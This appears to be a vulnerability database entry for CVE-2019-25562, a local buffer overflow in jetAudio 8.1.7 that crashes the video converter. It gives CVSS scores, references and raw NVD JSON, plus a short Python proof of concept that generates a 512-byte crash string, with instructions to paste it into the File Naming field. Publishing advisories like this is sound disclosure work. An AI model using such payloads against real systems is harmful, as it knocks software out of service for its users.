CVE-2019-25562

Description

jetAudio 8.1.7 contains a buffer overflow vulnerability in the video converter component that allows local attackers to crash the application by supplying an oversized string in the File Naming field. Attackers can paste a malicious buffer of 512 bytes into the File Naming parameter and trigger the crash by clicking the Preview button, causing a denial of service.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:jetaudio:jetaudio:8.1.7:*:*:*:*:*:*:* - VULNERABLE

jetAudio 8.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2019-25562
# This script generates the crash payload.
# Usage: Copy the output and paste it into the 'File Naming' field in jetAudio, then click 'Preview'.

def generate_payload():
    # The vulnerability is triggered by a 512 byte buffer
    payload = "A" * 512
    return payload

if __name__ == "__main__":
    crash_string = generate_payload()
    print(f"[+] Generated Payload Length: {len(crash_string)}")
    print(f"[+] Payload: {crash_string}")
    print("[+] Instruction: Paste the string into the 'File Naming' field and click 'Preview' to trigger the crash.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25562
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25562
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25562/
[4] VulDB https://vuldb.com/cve/CVE-2019-25562
[5] http://www.jetaudio.com/
[6] https://www.exploit-db.com/exploits/46818
[7] https://www.vulncheck.com/advisories/jetaudio-denial-of-service-via-file-naming-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25562", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:19.323", "lastModified": "2026-03-24T20:48:22.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jetAudio 8.1.7 contains a buffer overflow vulnerability in the video converter component that allows local attackers to crash the application by supplying an oversized string in the File Naming field. Attackers can paste a malicious buffer of 512 bytes into the File Naming parameter and trigger the crash by clicking the Preview button, causing a denial of service."}, {"lang": "es", "value": "jetAudio 8.1.7 contiene una vulnerabilidad de desbordamiento de búfer en el componente de conversión de video que permite a atacantes locales bloquear la aplicación al proporcionar una cadena de caracteres sobredimensionada en el campo File Naming. Los atacantes pueden pegar un búfer malicioso de 512 bytes en el parámetro File Naming y desencadenar el bloqueo al hacer clic en el botón Preview, causando una denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetaudio:jetaudio:8.1.7:*:*:*:*:*:*:*", "matchCriteriaId": "92B58A39-C461-4E62-B40A-2C6404D33F18"}]}]}], "references": [{"url": "http://www.jetaudio.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46818", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/jetaudio-denial-of-service-via-file-naming-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}